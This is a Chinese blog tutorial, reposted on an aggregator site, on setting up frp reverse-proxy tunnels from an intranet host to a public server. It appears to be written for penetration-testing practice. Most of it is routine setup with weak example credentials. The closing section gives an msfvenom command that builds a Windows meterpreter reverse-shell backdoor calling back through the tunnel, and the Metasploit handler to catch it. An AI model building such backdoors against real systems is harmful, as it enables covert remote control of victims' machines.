【内网安全-隧道搭建】内网穿透_Frp上线、测试

这篇具有很好参考价值的文章主要介绍了【内网安全-隧道搭建】内网穿透_Frp上线、测试。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

Frp(简易上线)

1、简述:

2、工具:

3、使用:

1、准备:

2、服务端(公网):

2、客户端(内网):

3、测试方法:

4、生成后门木马监听:


Frp(简易上线)

1、简述:

1)Frp (Fast Reverse Proxy) 是一个免费开源的用于内网穿透的反向代理应用,它支持 TCP、UDP 协议, 也为 HTTP、HTTPS 协议提供了额外的支持。


2)frp:服务端(装在公网ip的服务器上)+客户端(装在内网主机上)


3)中转站功能:实现公网 ←→ FRP(服务器) ←→ 内网 的连接(可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。)


4)原理:

第一步:服务端:运行,并监听端口,等待客户端连接

第二步:客户端:连接服务端的端口,告诉服务端要监听的端口和转发类型

第三步:服务端:创建新的进程,监听客户端指定的端口

第四步:外网用户:连接到客户端指定的端口,服务端通过和客户端的连接将数据转发到客户端

第五步:客户端:进程将数据转发到本地服务

2、工具:

URL:https://github.com/fatedier/frp

选择合适的版本

Releases · fatedier/frp (github.com)https://github.com/fatedier/frp/releases【内网安全-隧道搭建】内网穿透_Frp上线、测试

3、使用:

1、准备:

1)准备一个域名(注册一个,直接使用ip也可)

2)准备一个服务器(阿里云、腾讯云等都可以免费领一个月)

3)VM中搭建一个虚拟机(内网环境)

4)测试连通性,使用Xshell,或者准备一台非同一局域网下主机并使用ssh命令

5)下载frp工具

命令行输入:
wget  https://github.com/fatedier/frp/releases/download/v0.46.1/frp_0.46.1_linux_arm64.tar.gz

(下载太慢了,我直接下载到电脑上,然后使用xshell配套的xftp传上去)

【内网安全-隧道搭建】内网穿透_Frp上线、测试

先解压后再上传的话

1:上传到客户端上面的(即内网主机)

2:上传到服务端上面的(即公网服务器)

 【内网安全-隧道搭建】内网穿透_Frp上线、测试

s结尾代表server(服务端)

c结尾代表client(客户端)

——————

4)文件解压 

如果直接使用的命令下载的,就需要解压

tar -zxvf frp_0.46.1_linux_amd64.tar.gz

方法一:然后把服务端的文件cp出来(或删掉客户端文件)

sudo mkdir 创建文件夹
sudo cp 原文件的位置  将要复制到的位置 

方法二:直接删除客户端文件

rm frpc
rm frpc.ini
rm frpc_full.ini

解压之后文件夹改个名,方便操作

——————

5)文件添加权限(客户端、服务端)

cd /usr/local/frp
sudo chmod 777 frpc
(777为所有权限,也可以换为+x可执行权限,熟悉Linux的就不用多说了)

2、服务端(公网):

1)修改配置文件(frps.ini

编辑文件内容
vim ./frps.ini
配置文件内容
[common]
bind_port = 7000         # 服务端与客户端通信端口
dashboard_port = 7500    # 后台管理端口
dashboard_user = admin   # 后台登录用户名
dashboard_pwd = admin

vhost_http_port = 7002   # http穿透端口
vhost_https_port = 7003  # https穿透端口
max_pool_count = 50

token = 123456			 # 身份验证令牌,frpc要与frps一致
tcp_mux = true

log_file = /usr/local/frp/frps.log  # 日志相关配置
log_level = info
log_max_days = 3

authentication_timeout = 0  # 服务器与客户端时间相差15min会连接失败,0表示不验证
subdomain_host = ……         # 填写自己注册的域名
privilege_mode = true

——————

2)访问的端口开发

(以腾讯云为例)

方法一:

直接在服务器控制台上添加规则

【内网安全-隧道搭建】内网穿透_Frp上线、测试

方法二:

Linux使用命令行添加

# 添加监听端口
sudo firewall-cmd --permanent --add-port=7000/tcp
# 添加管理后台端口
sudo firewall-cmd --permanent --add-port=7500/tcp
sudo firewall-cmd --reload

方法三:

使用ufw、iptables工具

【内网安全-隧道搭建】内网穿透_Frp上线、测试

方法四:

直接关闭防火墙

——————

3)启动服务端:

./frps -c ./frps.ini

【内网安全-隧道搭建】内网穿透_Frp上线、测试

启动成功

——————

4)访问后台管理界面

服务器ip(或者域名):port(7500)

并使用自己设置的用户名,密码登陆

【内网安全-隧道搭建】内网穿透_Frp上线、测试

————

扩展:

关闭窗口会停止

所以,需要后台运行

nohup ./frps -c frps.ini &

【内网安全-隧道搭建】内网穿透_Frp上线、测试


2、客户端(内网):

1)解压、保留客户端配置文件

——————

2)修改配置文件

编辑配置文件
vim ./frpc.ini
# 客户端配置
[common]
server_addr = ……          # 公网服务器ip
server_port = 7000   	  # 公网服务端通信端口,与frps.ini的bind_port一致

token = 123456			  # 身份验证令牌,与服务端的frps.ini中token一致)
tcp_mux = true

log_file = /usr/local/frp/frpc.log	# 日志相关
log_level = info
log_max_days = 3
authentication_timeout = 0 			# 服务器与客户端时间相差15min会连接失败,0表示不验证

# 配置ssh服务
[ssh]							# 添加ssh节点 
type = tcp
local_ip = 192.168.xxx.xxx      # 或者127.0.0.1
local_port = 22
remote_port = 7001				# 指明由公网服务器的7001端口代理(ssh连接端口,远程服务端口)

# 配置http服务,可用于其他开发
[web01]							# 添加web节点
type = http
local_ip = 192.168.xxx.xxx      # 或者127.0.0.1
local_port = 8080				# 本地8080端口(自定义的tomcat服务)可以通公网服务器7002端口访问
subdomain = web01				# 自定义子域名

——————

3)防火墙端口开放

开放方法和服务端类似

——————

4)客户端启动

./frpc -c frpc.ini

3、测试方法:

方法一:

直接使用Xshell工具,对公网服务器进行连接(公网服务器ip)

端口设置为客户端指定的服务器代理端口(remote_port = 7001)

————

方法二:

使用不在同一局域网下的电脑

ssh admin@***.*.*.* -p 端口

# -p 指定服务器端口号,不指定端口则默认22,但此处修改为我们设置的ssh服务端口7001
# admin 为登录的用户名
# ***.*.*.* 为公网服务器ip/域名

————

注:

如果报错Connection closed by……

1、授予ssh权限

2、开启ssh服务


4、生成后门木马监听:

msfvenom -p windows/meterpreter/reverse_tcp lhost=公网服务器ip lport=服务端代理客户端的端口(即remote_port ) -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555

注:这个监听端口lport,与本地转发端口一致)
exploit文章来源地址https://www.toymoban.com/news/detail-404025.html

到了这里,关于【内网安全-隧道搭建】内网穿透_Frp上线、测试的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 如何搭建frp实现内网穿透?

    所谓内网穿透,也就是局域网能够直接通过公网的ip去访问,极大的方便用户的日常远程的一些操作的使用。比如nas的远程访问,个人博客的搭建等等。 然而,从公网中访问自己的私有设备向来是一件难事儿。 比如自己的主力台式机、NAS等等设备,它们可能处于路由器后,或

    2024年02月10日
    浏览(44)
  • 虚拟机服务器搭建+FRP内网穿透

    一、虚拟机安装         这里安装的是vmware workstation 17 pro和CentOS-7-x86_64-DVD-2009镜像文件  centos虚拟机服务器手把手搭建_虚拟机搭建服务器_无名之辈之码谷娃的博客-CSDN博客  这篇文章对虚拟机搭建讲的还是比较详细。 完成后,需要为用户添加sudo权限,不然你创建的用户是

    2024年01月20日
    浏览(49)
  • p70 内网安全-域横向内网漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内网漫游)

    数据来源         本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。   ​ 必要基础知识点: 内外网简单知识 内网 1 和内网 2 通信问题 正向反向协议通信连接问题 内网穿透代理隧道

    2024年02月05日
    浏览(44)
  • 阿里云搭建frp服务实现本地内网穿透

    如果使用我的链接购买阿里云服务器,我将免费提供帮忙搭建阿里云的frp服务。 背景 利用阿里云搭建frp服务,本地frp客户端来实现内网穿透,来达到访问没有公网ip的远程机器 frp服务端搭建 首先我们先安装一键部署frp的脚本,如果是阿里云的服务器直接用以下源: Aliyun 首先选

    2024年01月19日
    浏览(40)
  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(46)
  • 利用frp搭建自己的内网穿透服务器

    本教程基于以下环境完成 带有公网IP的云服务器一台,安装centos7.6系统 一个属于自己的域名,可以是二级域名 域名对应的证书文件 一台64位Windows系统的电脑 开源项目frp 证书文件主要是用来配置https访问的,如果没有证书文件可以参考我的这篇文章生成 centos7中申请Let‘s E

    2024年02月02日
    浏览(57)
  • 内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

    内网安全-隧道技术SSH实现通信DNS上线与通信CS上线Linux主机 一、DNS隧道技术 DNS简介:DNS协议为应用层协议,区域传输时用tcp协议,域名解析时用udp协议 ###通过DNS隧道绕过防火墙,实现CS上线 实验背景:靶机防火墙封禁出站TCP协议 1、判断出网协议,若果可以ping通,可以利用

    2024年02月02日
    浏览(52)
  • liunx使用sakura frp进行进行内网穿透,搭建网站

    工具:闲置域名、闲置电脑 我自己有域名和服务器,但是都快过期了,续费zjb贵,自己没啥东西要用服务器,不打算续费了 刚好有台闲置电脑,打算使用内网穿透搭建一个web,玩玩看。 官网:sakura frp 注册账号后去用户界面花费1元进行实名认证,就能获得两条免费隧道了

    2024年02月13日
    浏览(39)
  • 阿里云服务器搭建FRP实现内网穿透-P2P

    在了解frp - p2p之前,请先了解阿里云服务器搭建FRP实现内网穿透-转发: 文章地址    frp(Fast Reverse Proxy)是一个开源的反向代理工具,它提供了多种功能,包括端口映射、流量转发和内网穿透等。在frp中,P2P(Peer-to-Peer)功能允许直接将数据从一个客户端传输到另一个客户

    2024年02月10日
    浏览(43)
  • 使用Linux本地快速搭建web网站,并内网穿透发布上线「内网穿透」

    在web项目中,部署的web站点需要被外部访问,则需要一个媒介,通过把资源放在这个媒介中,再通过所暴露的端口指向这个站点,当外部访问这个媒介所对应的端口时,媒介指向站点,完成访问,像这种类似的媒介,常用的有tomcat容器、Apache等,这边使用Apache来建搭建。 Apache2 是一种流行的

    2024年02月16日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包